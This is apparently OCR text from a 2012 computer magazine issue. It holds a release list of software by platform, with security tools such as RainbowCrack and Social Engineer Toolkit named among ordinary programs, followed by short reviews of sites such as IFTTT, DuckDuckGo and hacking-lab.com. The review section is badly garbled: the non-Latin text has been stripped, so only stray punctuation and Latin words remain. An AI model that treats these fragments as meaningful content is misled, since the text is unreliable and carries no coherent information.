Controlled Vars 1.3.1
Eric 5.1.8
Freeglut 2.8.0
FreePascal 2.6.0
Gambas3 3.0.0
GNU Octave 3.6.0
GTK 3.3.10
Jython 2.5.2
LatencyTOP 0.5
libircclient 1.6
mxGraph 1.9.0.2
NetBeans 7.1
PHP 5.3.9
ProjectOr RIA 1.9.1
Reportico 2.3.1
Rudiments 0.35
Ultimix 1.5.177
wxPython 2.9.3.1
>>MAC
Adium 1.4.4
birthdayBook 6.0.6
Boxer 1.2.1
Cappuccino 1.11
fp 5.1
iFileX 1.1.1
iTweaX 3.0.2
LimeChat 2.30
MediaTube 1.0
Permanent Eraser 2.5.3
Praat 5.3.04
Raidcall 2.0
ShadowKiller 1.3
Skim 1.3.19
Sonora
SpeedTao beta1
TftpServer 3.4.1
Tunnelblick 3.2.3
>X-distr
PC-BSD 9.0
>System
Calculate-assemble 2.2.27
Coreutils 8.15
fstransform 0.3.7
Ipt-netflow 1.7.1
LCMC 1.2.0
Linux 3.2.2
Loadbars 0.4.0
oobash 0.39.1
OpenNebula 3.2.0
OpenNMS 1.8.17-1
Parallel 20120122
Raider 0.9.2
rxvt-unicode 9.15
systemd v38
Usermin 1.580
>Server
Apache 2.2.21
Asterisk 10.1.0
BIND 9.8.1-p1
CUPS 1.5.0
Dhcp 4.2.3-p2
Dovecot 2.0.17
FreeRADIUS 2.1.12
lighttpd 1.4.30
MySQL 5.5.20
NSD 3.2.9
OpenLDAP 2.4.28
OpenVPN 2.2.2
Postfix 2.8.7
PostgreSQL 9.1.2
OpenSSL 1.0.0g
RainbowCrack 1.5
Scapy 2.1.0
Scrapy 0.14
Social Engineer Toolkit v2.5
Spamdyke 4.3.1
Sshguard 1.5
sslyze 0.3
Stegnate 0.0.1
xca 0.9.1
03(158) 2012
UNITS / WWW2
WWW2
IFTTT
ifttt.com
IFTTT: if this, then that
, . ,
-: Gmail, Dropbox, Evernote, Instapaper, Facebook,
Twitter, Instagram, Foursquare . , : Facebook, . :
, SMS. -
, . Gmail
- , Evernote. RSS, e-mail. .
-
DUCKDUCKGO
duckduckgo.com
, . 2008
. -, DuckDuckGo
, . -, ,
. -, goodies, z (
..). DuckDuckGo
( , ).
nazamok.com
, .
. JavaScript IFrame . . , , -
.
,
nazamok.com. , -
150 ,
. , e-mail.
www.hacking-lab.com
.
, , . .
OWASP Hacking-Lab.
( LiveCD VirtualBox), VPN- , . ,
, . .
144
03 /158/ 2012